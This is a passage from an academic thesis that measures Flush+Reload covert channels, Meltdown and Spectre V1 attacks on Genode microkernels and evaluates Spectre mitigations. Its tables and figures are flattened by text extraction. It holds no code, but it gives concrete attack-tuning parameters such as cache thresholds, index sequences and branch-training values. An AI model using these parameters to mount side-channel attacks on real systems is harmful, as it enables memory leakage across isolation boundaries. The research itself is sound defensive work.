4.1.1 Choosing Cache-Hit Thresholds Figures 4.1 to 4.3 show the times taken to access values which have been stored in LLC, those stored in L1 cache as well as values which were not cached. These access times were measured using the timing function described in Listing 2.2. It can be seen that there are three distinct levels of memory access times. Levels which can distinguished from each other via the use of a high resolution timer. A memory access can thus be determined to be from the L1 cache, the LLC or DRAM. Table 4.1 shows the choices of tLLC and tL1 for each kernel along with a valid interval for the choices. The valid interval describes the interval in which there are no measurements from the cache level above and all from the desired one. For example, there are no measurements from LLC below 73 cycles on Okl4. Thus, the valid interval for tL1 on Okl4 is [56, 72]. The choice of tLLC and tL1 was chosen as the upper bound of the measurements for the LLC and L1 cache respectively.

30 4.1. Flush+Reload

300

Uncached LLC Cached L1 Cached tLLC = 81 tL1 = 51 Access Time (Cycles) 0 0 20 40 60 80 100 120 140 160 180 200 220 240 Value

Figure 4.1: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4.

300

Uncached LLC Cached L1 Cached tLLC = 80 tL1 = 42 Access Time (Cycles) 0 0 20 40 60 80 100 120 140 160 180 200 220 240 Value

Figure 4.2: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova.

P P Kernel tLLC tLLC tL1 tL1 Okl4 81 [81, 239] 56 [56, 72] Nova 80 [80, 219] 42 [42, 64] Linux 139 [139, 239] 54 [54, 78] Table 4.1: The Cache-hit thresholds in CPU cycles for each kernel.

4.1.2 Preventing Data Prefetching Tables 4.2 to 4.4 shows the number of detected cache hits from the array reads using the SRGs from Equations (3.2) and (3.3) and different sizes of the internal padding. The SRG 49i mod 256 is the preventing prefetching at the smallest internal padding and thus results in the smallest memory footprint of the Flush+Reload channel. Therefore, the SRG in Equation (3.2) and the internal padding of length 256 was used to obtain further results.

4096 2048 1024 512 256 128 49i mod 256 0 0 0 0 2 8173 33i mod 256 0 0 2299 1 400 5916 i 0 0 28777 31427 31974 61137 Table 4.2: Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Okl4 for different internal padding sizes.

31 4.1. Flush+Reload

Uncached 300 LLC Cached L1 Cached

tLLC = 139

t = 54

Access Time (Cycles) L1 0 0 20 40 60 80 100 120 140 160 180 200 220 240 Value

Figure 4.3: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux.

4096 2048 1024 512 256 128 49i mod 256 0 0 0 1 1 8936 33i mod 256 0 0 1900 1 401 7283 i 0 0 27357 31666 32242 61541 Table 4.3: Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Nova for different internal padding sizes.

4096 2048 1024 512 256 128 49i mod 256 1 0 0 0 1 7569 33i mod 256 0 1 1787 0 400 5798 i 0 0 14691 29007 33259 62166 Table 4.4: Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Linux for different internal padding sizes.

300

200

100 idx = 49i mod 256 Number of cycles idx = 33i mod 256 sequential access 0 16 32 48 64 80 96 112 128 144 160 176 192 208 224 240 Iteration

Figure 4.4: Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on OKl4.

32 4.1. Flush+Reload

300

200

100 idx = 49i mod 256 Number of cycles idx = 33i mod 256 sequential access 0 16 32 48 64 80 96 112 128 144 160 176 192 208 224 240 Iteration

Figure 4.5: Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4.

Figures 4.4 and 4.5 shows the time it takes to fetch each value in an uncached array using an internal padding 256 and 4096 bytes respectively. The plots were created by iterating over the array in some order and measuring the time for each array access. Measurements using a sequential access pattern is presented for completeness. In Figure 4.5, it can be seen that there is no prefetching when an internal padding of 4096 is used. In Figure 4.4, it can be seen that the SRG idx = 49i mod 256 results in memory access times comparable to DRAM accesses. Thus, it is successfully preventing prefetching and the internal padding can be reduced to 256 without performance degredation.

4.1.3 Measuring Throughput Our results in Tables 4.5 and 4.6 shows how Flush+Reload can be used as a side or covert channel both between and within processes; Linux had the highest throughput in both cases. Linux had a similar or lower number of correct bytes but did still have a greater throughput compared two the microkernels, this shows that Linux had a lower execution time than Okl4 and Nova. Flush+Reload was able to transmit a maximum of 26383 Bps when reading and writing in the same process using one attempt. The data for each kernel is presented in Table 4.5. Flush+Reload, when used as a covert channel, was able to transmit a maximum of 13436 Bps

Kernel Correct Incorrect Missing Throughput (Bps) Okl4 1858 190 0 1651 Nova 1711 331 6 29500 Linux 1926 122 0 26383 Table 4.5: Reading 2048 bytes with Flush+Reload within one process. between two processes using one attempt. The data for each kernel is presented in Table 4.6. Okl4 and Nova’s low throughput may be a consequence of the locking mechanism used, for further discussion see 5.1.4.

4.1.4 Reducing Noise Results from using the method to reduce noise described in Section 3.2.5 is presented in this section. Tables 4.7 to 4.9 contains the result from noise reduction when Flush+Reload was used within a process. Tables 4.10 to 4.12 show the result of noise reduction when

33 4.1. Flush+Reload

Kernel Correct Incorrect Missing Throughput (Bps) Okl4 1777 255 0 36 Nova 1803 245 0 44 Linux 1247 281 520 13409 Table 4.6: Reading 2048 bytes with Flush+Reload between two processes.

Flush+Reload was used to communicate between processes. As can be seen in Table 4.7 there was a slight increase in throughput for two attempts on Genode+Okl4. On Genode+Linux the increase was more substantial, see Table 4.12. Consequently, two attempts will be used for further results on Genode+Linux for communication between two processes.

Number of Attempts Correct Incorrect Missing Throughput (Bps) 1 1858 190 0 1651 2 1879 169 0 1655 3 1885 163 0 1578 4 1884 164 0 1481 5 1890 158 0 1428 6 1886 162 0 1372 7 1887 161 0 1301 8 1888 160 0 1250 9 1889 159 0 1202 10 1889 159 0 1160 Table 4.7: Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with different number of attempts.

Number of Attempts Correct Incorrect Missing Throughput (Bps) 1 1711 331 6 29500 2 1726 316 6 15140 3 1730 312 6 10176 4 1730 312 6 7655 5 1730 312 6 6113 6 1731 310 7 5091 7 1736 306 6 4395 8 1729 313 6 3825 9 1732 310 6 3409 10 1737 304 7 3080 Table 4.8: Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with different number of attempts.

34 4.1. Flush+Reload

Number of Attempts Correct Incorrect Missing Throughput (Bps) 1 1838 210 0 30131 2 1830 218 0 15000 3 1831 217 0 10060 4 1857 191 0 7674 5 1858 190 0 6112 6 1844 192 12 5052 7 1848 190 10 4358 8 1831 189 28 3677 9 1821 227 0 3354 10 1857 191 0 3085 Table 4.9: Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with different number of attempts.

Number of Attempts Correct Incorrect Missing Throughput (Bps) 1 1793 271 0 36 2 1906 158 0 19 3 1904 160 0 13 4 1913 151 0 10 5 508 1556 0 2 6 271 1793 0 1 7 1902 162 0 6 8 1923 141 0 5 9 1934 130 0 4 10 1931 133 0 4 Table 4.10: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4 with different number of attempts.

Number of Attempts Correct Incorrect Missing Throughput (Bps) 1 1803 245 0 44 2 1864 184 0 23 3 1693 355 0 14 4 1741 307 0 11 5 1765 283 0 9 6 1617 431 0 7 7 1881 167 0 7 8 1884 164 0 6 9 1830 218 0 5 10 1791 257 0 4 Table 4.11: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova with different number of attempts.

35 4.1. Flush+Reload

Number of Attempts Correct Incorrect Missing Throughput (Bps) 1 1247 281 520 13409 2 2048 0 0 14222 3 2033 15 0 2417 4 2048 0 0 2054 5 2048 0 0 2677 6 2048 0 0 2056 7 2048 0 0 1549 8 2048 0 0 2495 9 2048 0 0 1925 10 2048 0 0 2296 Table 4.12: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Linux with different number of attempts.

36 4.2. Meltdown

4.2 Meltdown

The throughput of the Meltdown attack targeting a victim, as described in Section 3.3, is presented in Section 4.2.1. The negative result targeting the Linux banner is presented in Section 4.2.2.

4.2.1 Reading a Victim’s Secret The resulting throughput using our Meltdown attack to read 2048 bytes from another process is shown in Figure 4.6. The result shows a fluctuating throughput, ranging from 63 to 11070 Bps.

¤104

1

0.5 Throughput (Bps)

0 32 64 96 128 160 192 224 Test number

Figure 4.6: Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux.

4.2.2 Reading the Linux Version Banner The reading of the Linux banner with the Meltdown attack was unsuccessful; no bytes were transmitted. Hence, the attack had a throughput of 0 Bps.

4.3 Spectre

The results for the choice of Hs to ensure speculative execution is presented in Section 4.3.2. The choice for Na and Ta are presented in Section 4.3.1. The throughput of the Spectre V1 attack using these parameter choices are presented for all kernels in Section 4.3.3. Benchmarks for RPCs are presented in Section 4.3.4.

4.3.1 Training the Branch Predictor

Attack period, Ta, and number of attacks per measurement, Na, were tested for 2 ¤ Ta ¤ 10 and 1 ¤ Na ¤ 10 on Okl4, Nova and Linux. The result from the tests are shown in Figures 4.7 to 4.9. The results shows that all the kernels have the highest throughput at Na = 1 and Ta = 3. Furthermore, the throughput tends to be lower when Na or Ta approaches higher values.

37 4.3. Spectre

800 10 9 8 600 7 a

T 6 400 5 4 3 200 Throughput (Bps) 2 0 1 2 3 4 5 6 7 8 9 10 Na

Figure 4.7: Throughput out of for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Okl4.

10 1,500 9 8 7 1,000 a

T 6 5 4 500 3 Throughput (Bps) 2 0 1 2 3 4 5 6 7 8 9 10 Na

Figure 4.8: Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Nova.

10 9 3,000 8 7

a 2,000

T 6 5 4 1,000 3 Throughput (Bps) 2 0 1 2 3 4 5 6 7 8 9 10 Na

Figure 4.9: Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Linux.

38 4.3. Spectre

4.3.2 Ensuring Speculative Execution 15 17 The Spectre V1 attack on Okl4, Nova and Linux had its highest throughputs at Hs = 2 , 2 20 5 and 2 respectively. Note that the difference in Hs varies a factor of 2 between kernels, thus, choosing a single value for all kernels is likely not suitable.

2,000 Okl4 Nova 1,500 Linux

1,000

Throughput (Bps) 500

0 26 29 212 215 218 221 224 Hs

Figure 4.10: Throughput for Spectre V1 using different choices of Hs for heuristically flushing the cache.

4.3.3 Attack Throughput The result from trying to read 2048 bytes from an array containing random values with our Spectre V1 implementation is presented in Table 4.13. The results shows the highest throughput for Nova at 1760 Bps.

Kernel Retries Na Ta Hs Throughput (Bps) Okl4 1 1 3 215 1029 Nova 1 1 3 217 1760 Linux 2 1 3 220 525 Table 4.13: Result of reading 2048 bytes with Spectre V1 with chosen parameters.

4.3.4 Mitigations The RPC benchmarks on Okl4, Nova and Linux before and after applied Spectre V1 mitigations are presented in Figures 4.11 to 4.13. The relative slowdown of these mitigations are presented in Tables 4.14 and 4.15

39 4.3. Spectre

¤104 2.2 No mitigation No mitigation lfence array_index_mask_nospec 2.15

2.1

2.05 CPU cycles

2

1.95 1 128 254 382 512 1 128 254 382 512 Test number Test number

Figure 4.11: Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations.

¤104

3.7 No mitigation No mitigation lfence array_index_mask_nospec

3.6

3.5 CPU cycles 3.4

3.3

1 128 254 382 512 1 128 254 382 512 Test number Test number

Figure 4.12: Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations.

40 4.3. Spectre

¤104

No mitigation No mitigation 7 lfence array_index_mask_nospec

6 CPU cycles 5

4 1 128 254 382 512 1 128 254 382 512 Test number Test number

Figure 4.13: Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations.

Kernel Mean Standard deviation Okl4 0.9875 0.2305 Nova 0.9992 0.0090 Linux 1.0077 0.3430 Table 4.14: Mean relative slowdown and standard deviation after applied lfence mitigation.

Kernel Mean Standard deviation Okl4 0.9908 0.3242 Nova 1.0028 0.0107 Linux 1.0310 0.3365 Table 4.15: Mean relative slowdown and standard deviation after applied bitmask mitigation.

4.3.5 Error Sources During measurements, some anomalies were identified, one being unstable performance on the Linux kernel. Figure 4.14 show how the result for the different kernels change between compilations of the same source code. Furthermore, Figure 4.15 shows the result between runs with the same binaries.

41 4.3. Spectre

100%

80%

60%

Accuracy 40%

Okl4 20% Nova Linux 1 3 5 7 9 Test number

Figure 4.14: Percentage of correctly read bytes from reading 2048 bytes and compiling the application between each test.

100%

80%

60%

Okl4 40% Accuracy Nova Linux 20%

0%

1 4 7 10 13 Test number

Figure 4.15: Percentage of correctly read bytes from reading 2048 bytes from running the same binary multiple times on Linux.

42 5 Discussion

The method is discussed in terms of its reliability, validity and replicability in conjunction with each attack. In addition, anomalies in the results are also discussed. The impact of this work, Microarchitectural attacks and SCAs are discussed in a wider context in Section 5.5. The result of the produced covert channel and Spectre attack are considered successful, whereas further work is needed to evaluate if microkernels are vulnerable to Meltdown. We have shown that it is possible to use a Flush+Reload channel to communicate both within and between processes, consequently breaking Genode’s strict IPC policies. We have demonstrated that it is possible to construct a Meltdown attack targeting Genode and that this attack is successful on Genode+Linux. Furthermore, an Spectre V1 attack has been performed successfully on all the tested microkernels. Microarchitectural attacks are highly reliant on hardware and despite our best efforts we have not found closely detailed ways to configure these attacks; this is likely in part due to the proprietary nature of the hardware. Consequently, there may be difficulties obtaining the same results on other hardware. However, the methodology should be reproducible on other hardware supporting the same instruction sets. Factors not detailed about the tested system may affect results, such as other processes running concurrently on the system or how the processes are scheduled on the CPU cores.

5.1 Flush+Reload

Although Flush+Reload is conceptually well defined, its realization may vary with available timers. Moreover, there are implementation-specific techniques which have been used, these need evaluation and may require some discussion of their validity.

5.1.1 Cache-Hit Measurements One validity issue with our method of measuring cache hits is that there is no guarantee that the LLC threshold is truly a threshold below which everything is accesses to LLC. It is entirely possible for the kernel to schedule the measuring process and the measured process on the same core, thereby allowing values to be accessed from caches below LLC. Consequently, all these measurements may be from lower-level caches. However, it is highly likely that the

43 5.1. Flush+Reload measurements were from the LLC or the L2 cache since the result of measuring the LLC gave another result than the measurements from L1 cache. Issues with the L1 cache threshold we deem less likely. It is possible that all accesses to the L1 cache are in fact to higher level caches but, given the less complex method of measuring, at least some measurements should be of the L1 cache.

5.1.2 Choosing Cache-Hit Thresholds As we can see in Figures 4.2 and 4.3 there are significant spikes for some uncached values. These spikes are unlikely regular DRAM accesses as they are significantly slower than the expected  250 cycles. These values are in the [1000, 2500] range and are more likely the result of context switching between the start and end of the timer. This is less likely to happen in the LLC and L1 cache tests as the fetch time for these values are lower and, therefore, gives the kernel less time to context switch. The exploits Spectre and Meltdown are highly dependant on hardware, thus efforts to replicate exploits on other CPUs may vary. The choice of cache-hit thresholds tL1 and tLLC as shown in Figures 4.1 to 4.3 may have to be chosen differently depending on cache and memory speeds. Zhou et al. [50] suggests that thresholds should be chosen to be just below the lower bound of the closest higher memory level. However, we found that using this recommendation resulted in a noisy channel which resulted in a lower throughput on the tested machine.

5.1.3 Preventing Data Prefetching With the object of preventing data prefetching we can see in Figure 4.5 that using an offset of 4kB successfully removes false cache hits. Furthermore, in Tables 4.2 to 4.4 we see that using an SRG can significantly reduce memory requirements. However, we can see that one SRG does not get progressively worse for smaller padding sizes, which is surprising, as the expected behavior is that the CPU more easily detect semi-sequential patterns for smaller paddings. In addition, the SRG may need to be evaluated on each CPU. It is likely that some SRGs may perform better than others in general, as the main parameter determining prefetching is subsequent sequential accesses. Thus, the performance is depends on whether the sequence generated by the SRG has such a pattern. It may also be possible to exclude SRGs and instead craft a non-sequential pattern which yields good results.

5.1.4 Inaccuracies in Throughput Measurements Two different methods were used to measure the execution time. For Okl4, the execution time was measured on the measuring system. This method is less accurate as the delay of delivering data via serial communication affects the measurements. Hence, the execution time will be dominated by the measurement overhead for low attempt counts. A greater execution time will lower the impact of the delay. This may be the reason why Okl4 is the only kernel with a greater throughput at two attempts when using Flush+Reload as a channel within a process, see Table 4.7. It is expected that doubling the number of attempts should result in twice the execution time. It is unexpected that the throughput of Flush+Reload within a process performs equally well for one and two attempts, with only a small change in number of correct bytes, as is observed on Okl4. Genode+Linux had a significantly higher throughput opposed to Genode on the microkernels. We believe that, when Flush+reload is used to communicate between processes, the significant difference in throughput is largely due to processes being schedule on the same core on Genode+Nova/Okl4. This is based on a much slower execution time when synchronization was applied, indicating that a majority of the execution time in Nova

44 5.2. Meltdown and Okl4 is due to locking. The throughput of Flush+Reload with a different synchronization strategy may be significantly higher than the current implementation.

5.1.5 Reducing Noise We can see in Tables 4.8 to 4.11 that there is no substantial improvement for the covert channel with respect to number of attempts. The concept may be more successful in cases where synchronization is not performed or where synchronization measures are not available. The only test giving a higher number of correct bytes was with Genode+Linux using Flush+Reload between two processes, see Table 4.12.

5.2 Meltdown

Our Meltdown attack gave a fluctuating throughput, running the attack gave everything from a throughput of 63 to 11070 Bps. An implementation returning only 0xFF would transmit a byte observed as correct every 256th transmission or 8 times out of 2048, assuming equally distributed input. Furthermore, execution time for the attack was similar to 0.1 s. 8 Bytes Therefore, an attack returning only noise would have a throughput of 0.1 s = 80 Bps. Thus, the results having a throughput of around 80 Bps is regarded as noise.

5.2.1 Alternative Segmentation Fault Recovery Two methods were evaluated for recovering from the segmentation fault which was triggered by the illegal read: child process spawning and Intel TSX. Although the second approach requires certain hardware, the first poses several problems. Firstly the allocation of a second process and with this, the time it takes to allocate and start this process. Secondly, synchronization between sender and receiver as there is now potentially two concurrently running processes. Thirdly, it raises a segmentation fault to the kernel resulting in the sender crashing. Using Intel TSX does result in a faulty access, but the TSX mechanism protects the process from the kernel interfering, as the code which raised it is not conceptually executed. We were unsuccessful with the child spawning design as it was significantly slower, the overhead of starting processes became a bottleneck, and it eventually caused a segmentation fault in the receiver. This design may still be successful, thus removing the need for Intel TSX. However, such a design will still suffer from significantly slower execution due to the overhead of spawning processes.

5.2.2 Turning off Mitigations It may be considered unreasonable to turn off mitigations for Meltdown in order to allow the attack to work. However, as performance impact can be significant for some applications which are heavy on system calls. We think that there is still interest in this case. Furthermore, turning off mitigations has allowed us to establish that Genode is vulnerable to the Meltdown attack and that it does nothing which prevents the Meltdown attack on its own.

5.2.3 The Difficulties of Reading Secrets The Meltdown attack presented some difficulties in the context of Genode. Genode did not support control over which core a process should execute on, nor was there access to a shed_yield operation. These tools greatly improve success of the published Meltdown POC [31].

45 5.3. Spectre

5.2.4 Reliability Issues with Meltdown We were able to read with a throughput of approximately 11000 Bps in some tests, however, we were only able to reproduce this a handful of times. We suspect that reliability issues are due to scheduling-race conditions and uncached data, we base this on the fact that the Meltdown attack is very successful at reading its own process memory. We were not able to read the Linux banner, if that is pure coincidence or due to other circumstances we have not been able to determine. One aspect that made it more difficult to read the Linux banner was the lack of cached data. In our experiment, the banner was not cached prior to the attack, which may result in a lower chance of success.

5.3 Spectre

Some of the methodologies to implement Spectre may prove to be suboptimal or ineffective on different systems. As these attacks are highly reliant on hardware, it may be the case that the methologies for configuring the attack may not generalize well to other hardware. Using retries as a method of improving successful transmission has been tried by others [24] but has not significantly improved the results in the experiments we conducted. Furthermore, the use of an SRG was demonstrated to significantly vary in performance, depending on distance between accessed values and which SRG is used. The Spectre V1 attack abuses a very specific type of RPC. The result shows that neither Genode nor the microkernels Nova and Okl4 are invulnerable to the Spectre V1 attack. Therefore, there is a need to apply mitigations in order to be protected against Spectre.

5.3.1 Training the Branch Predictor

First of all, it should be noted the method for choosing Na and Ta is unlikely to be optimal. To the best of our knowledge, there has been no work demonstrating optimizations of these values. Thus, the purpose of the effort to choose Na and Ta well with respect to throughput is merely to find working values and to gauge the magnitude of the possible throughput. The result of trying different number of attacks per measurement Na and attack period Ta can be seen in Figures 4.7 to 4.9. All three result has there greatest peaks at Na = 1 and Ta = 3 as well as tending to lower throughput for larger values of Na and Ta. Linux seems to show a somewhat randomized pattern; the variations may be due to the instability of the implementation on Genode+Linux, see Figures 4.14 and 4.15. The computer was not reset between the tests for choosing Na and Ta. This was done to reduce execution time for the tests. This may have lead to some noise when reading the first bytes since the BTB had not been flushed. However, the significant amount of bytes read by the attack should have reduce the noise’s impact on the result.

5.3.2 Criticism of Heuristic Cache Flush The heuristic cache flush technique described in Section 3.4.1 has not been verified, it was used as no other method of flushing the cache without a reference address was found. The result in Section 4.3.2 were obtained as a step to verify the methodology. It is noteworthy that the throughput declines with increasing sizes. We deem this phenomenon likely to be due to increased execution time, as one would expect a linear decline when increasing the size given that the cache flush is successful above some size.

5.3.3 Throughput Anomalies Table 4.13 shows the throughput of our Spectre V1 attack, where the throughput for both Okl4 and Nova was higher than the throughput of the Flush+Reload channel used. This may seem strange, but is probably an effect of our locking method described in Section 3.2.4. Our

46 5.4. Source criticism

Spectre attack dose not uses the same locking and dose instead use the RPC call as a lock, which seems to be more efficient. The current implementation of Flush+Reload uses busy waiting, a better solution would probably be to yield during the wait; increasing the chance of the other process getting scheduled and lowering the execution time. However, we could not find an easy and working method of yielding in Genode. It can be observed in Figures 4.14 and 4.15 that the accuracy aLinux varies substantially between compilations and execution, 12% a 99% between compilations and 12.4% a 99.1% between runs. Due to the hardware dependant nature of the problem, small differences in realized assembler may result in different results. Hence, efforts to reproduce results for Linux may vary. For Okl4 and Nova the variations were substantially smaller,

39.1% aOkl4 54.9% and 78.3% aNova 97.3% between compilations and 52.3% aOkl4 54.9% and 84.4% aNova 97.5% between runs respectively.

5.3.4 Small Impact on Performance Figures 4.11 to 4.13 shows the number of CPU cycles needed to use our RPC both with and without Spectre V1 mitigation. From Figures 4.11 to 4.13 and tables 4.14 and 4.15 we can see that the mitigation had no real impact on performance, in some cases the RPC with mitigations was faster than using the RPC without mitigations. Both the lfence and the bitmask mitigation should only needs a small number of CPU cycles to execute compared to the  2000 cycles needed to run the RPC.

5.4 Source criticism

There are some concerns with the sources used in this thesis. With regards to CPU optimizations, information is in many cases not that specific, describing only the principle mechanisms and not the exact rules by which they function. This leaves the methodology and results prone to anomalies which are difficult to explain. Information relating to the exact workings of many of these mechanisms are proprietary and are thus not available. However, for the purpose of these experiments, these models have proven sufficient to implement working attacks. An exception to the error sources with hardware mechanisms are the methods for timing. This information is deemed more reliable, as Intel has published exact recommendations for timing on their CPUs. Similarly, for information regarding Intel TSX, the inner workings of this instruction set are not of interest for these attacks, merely their public specification. For the implementation of Meltdown and Spectre, the primary sources are the original papers [31, 24]. These also contain POC implementations which have been used to define implementation parameters as well as central design concepts. Although this is considered a good source, the workings of the presented Meltdown and Spectre POCs are not closely described. There is a substantial body of work related to Meltdown [31, 36, 45] and Spectre [24, 33, 42, 22] but very few present source code. Consequently, a combination of these POCs and implementations found on Github have been used. We can not vouch for the quality of these sources besides their merit of supplying working implementations. For information regarding Genode, the primary source has been the book Genode Foundations [7] by Feske. Some other work relating to security and Genode was found via Scholar, primarily relating to the use of Genode and ARM TrustZone for Android. No work related to Meltdown and Spectre on Genode has been found. Therefore, an email by Feske1 has been the primary source of information for microarchitectural attacks in Genode. To search for sources on Genode the databases IEEE Xplore, ACM digital library and Google Scholar were used.

1N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).

47 5.5. The Work in a Wider Context

5.5 The Work in a Wider Context

The subject of microarchitectural attacks, Spectre and Meltdown in particular, have received much attention since the work of Kocher et al. [24] and Lipp et al. [31]. This is no surprise, as Lipp et al. showed that the Meltdown attack can dump memory from a victim process, demonstrating this on Firefox. Similarly, Kocher et al. showed that a Spectre attack can be used to leak host memory from within a virtualized environment. Since then, several others have contributed to these types of attacks. As brought up by Mcilroy et al. [33], microarchitectural attacks are not easily resolvable and they are a bigger problem than previously anticipated. Mcilroy et al. found abstractions to be an issue, that is, our view of how the CPU functions is overly simplified and knowledgeable attackers may exploit this fact, especially in the pursuit of uncompromising performance. Consequently, microarchitectural state has been assumed unobservable. Although CPUs become faster, they also become more complex, with this complexity comes a security cost and likely more complexity to address security issues. Microkernels are certainly an approach to reduce the complexity of the core kernel, but the kernels separation is threatened if user processes can bypass the kernel’s barriers.

5.5.1 Can OS Memory Separation be Trusted? As brought up by Mcilroy et al. [33], OS memory separation can be of great use since user-process separation cannot guarantee separation when hardware is untrusted. by the OS may be of some help, if not against Spectre, it definitively protects against the workings of Meltdown. Microkernels may not by definition mitigate Meltdown but may keep less exploitable information for Meltdown. Furthermore, there is little to indicate that microkernels help the issue with respect to Spectre. There are mitigations to variations of Spectre, but new versions of the attack such as NetSpectre [42] and SpectreRSB [25] indicate that the problem may be bigger than anticipated. However, something which may prove in favor of microkernels is the small code size. A small code size may make the analysis against microarchitectural attacks easier. Still, the problem remains as much of the issues are closely related to the workings of hardware.

5.5.2 Can Hardware Separation be Trusted? The scope of Spectre attacks are likely more widespread than anticipated as Mcilroy et al. stated [33]. Although they were not successful in demonstrating these attacks on ARM and AMD CPUs, they too utilize an RSB. Thus, there may be interest in investigating possibilities to utilize SCAs to violate the ARM Trustzone use-cases for Genode. It is likely that some use-cases is vulnerable to SCAs; as it has been demonstrated by Bukasa et al. [3] that the ARM Trustzone is ineffective at preventing power analysis SCAs and, Lapid and Wool [29] mounted a side-channel cache attack against the ARM32 AES implementation.

5.5.3 Consequences for Security and Safety Critical Systems The presence of microarchitectural attacks may compromise claims of security against certain types of attacks. Still, secure design may leave valuable guarantees against other types of attacks. Values in that microarchitectural attack are not trivial in construction and in many cases requires execution privileges on the device. Although the difficulty of the attack execution may change and that local execution privileges may not be a requirement as shown by Schwarz et al. with NetSpectre [42] and Lipp et al. with [30]. For very safety or security-critical applications, such as medical devices and vehicular communications, using specialized hardware which is not affected by known attacks needs to be considered.

48 5.5. The Work in a Wider Context

5.5.4 Impact of This Work Microarchitectural attacks do pose a threat to privacy and security as demonstrated by several works [31]2. This work demonstrates that efforts to obtain a truly secure kernel using Genode is not without its security flaws. The kernel may still be vulnerable to microarchitectural attacks. Consequently, high assurance applications can still not give absolute guarantees. There is a need for awareness of microarchitectural attacks and possibly mitigation. In the case demonstrated in this thesis, countermeasures can be put in place to secure communication mechanisms against Spectre V1.

2J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/ Articles/744287/ (visited on 2019-03-25).

49 6 Conclusion

In this thesis we have examined the vulnerability of microkernels with respect to the microarchitectural attacks Meltdown and Spectre V1. Furthermore, the performance impact of Spectre V1 mitigations were examined. The targeted microkernels were Okl4, Nova and Linux. These kernels were run within the Genode OS framework for evaluation.The successful Meltdown implementation required Intel TSX as suppressing a segmentation fault was not an option. Another design based on spawning processes may prove successful but incurs extra runtime costs; no successful results were produced with such a design.

• Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of demonstrated channel? A covert Flush+Reload channel was demonstrated in Genode with a throughput of 36 Bps on Okl4, 44 Bps on Nova and 13409 Bps on Linux. The large discrepancy between Linux and microkernels deemed likely to stem from scheduling differences.

• Are RPC mechanisms in the microkernels Nova and Okl4 vulnerable to the Spectre, measured as throughput of demonstrated attack? Microkernels were determined to be vulnerable to Spectre V1 and a POC was produced with a throughput 1029 Bps on Okl4, 1760 Bps on Nova and 525 Bps on Linux.

• Can the Meltdown attack be executed on Genode? Results regarding microkernels vulnerability to Meltdown are inconclusive. However, an attack reading the secret of another process in Genode running on Linux was demonstrated with a throughput of 11070 Bps.

• What is the performance impact of Spectre V1 mitigations alternatives, measured as relative slowdown of RPC mechanisms? The Spectre mitigations of bitmasking and instruction stream serialization was evaluated, yielding relative slowdown of 3% for serialization and 4% for bitmasking, see Tables 4.14 and 4.15.

It was determined that microkernels and Genode are not secure by design against microarchitectural attacks. This has been demonstrated by the Spectre V1 attack with a

50 6.1. Future Work throughput ¡ 1kB/s and the Meltdown attack with throughput ¡ 10kB/s. Microkernels do have some benefits with regards to mitigating Meltdown as several kernels do not map kernel space into user space and are consequently only affected by Meltdown in a limited way. In addition, Genode does not support for custom segmentation fault handlers. Consequently, the Meltdown attack requires another recovery tool, one such viable option is Intel TSX.

6.1 Future Work

For future work, the most obvious thing is to determine a target for the Meltdown attack against microkernels in Genode and rigorously attack these targeted addresses. It can also be interesting to pursue another segmentation fault recovery design; this is interesting as Intel TSX is only present on some Intel CPUs [20]. With respect to Spectre V1, it may be interesting to target existing Genode components which expose vulnerable RPCs or implement other Spectre variants which use different techniques, such as variants 2, 3 or SectreRSB [24, 25]. Trying these different variants can further establish the scope of Spectre’s impact on microkernels.

51 Bibliography

[1] T. Brito, N. O. Duarte, and N. Santos. “ARM TrustZone for Secure Image Processing on the Cloud”. In: IEEE 35th Symposium on Reliable Distributed Systems Workshops (SRDSW). Sept. 2016, pp. 37–42. DOI: 10.1109/SRDSW.2016.17. [2] D. Brumley and D. Boneh. “Remote Timing Attacks Are Practical”. In: Proceedings of the 12th Conference on USENIX Security Symposium. SSYM. event-place: Washington, DC. USENIX Association, 2003. [3] S. K. Bukasa, R. Lashermes, H. Le Bouder, J. Lanet, and A. Legay. “How TrustZone Could Be Bypassed: Side-Channel Attacks on a Modern System-on-Chip”. en. In: Information Security Theory and Practice. Ed. by G.P. Hancke and E. Damiani. Vol. 10741. Cham: Springer International Publishing, 2018, pp. 93–109. ISBN: 978-3-319-93523-2 978- 3-319-93524-9. DOI: 10.1007/978-3-319-93524-9_6. [4] cgroups(7) - Linux manual page. URL: http://man7.org/linux/man-pages/man7/ cgroups.7.html (visited on 2019-02-21). [5] S. Constable, A. Sahebolamri, and S. Chapin. “Extending seL4 Integrity to the Genode OS Framework”. In: (2017). [6] J. Corbet and G. Kroah-Hartman. “Linux Kernel Development How Fast It is Going, Who is Doing It, What They Are Doing and Who is Sponsoring the Work”. In: (2016), p. 18. URL: http://go.linuxfoundation.org/l/6342/el- Development- Report-2016-pdf/3vr4pg. [7] N. Feske. Foundations: GENODE Operating System Framework 18.05. GENODE LABS, 2018. URL: https://genode.org/documentation/genode-foundations-18- 05.pdf. [8] Q. Ge, Y. Yarom, D. Cock, and G. Heiser. “A survey of microarchitectural timing attacks and countermeasures on contemporary hardware”. In: Journal of Cryptographic Engineering 8.1 (Apr. 2018), pp. 1–27. ISSN: 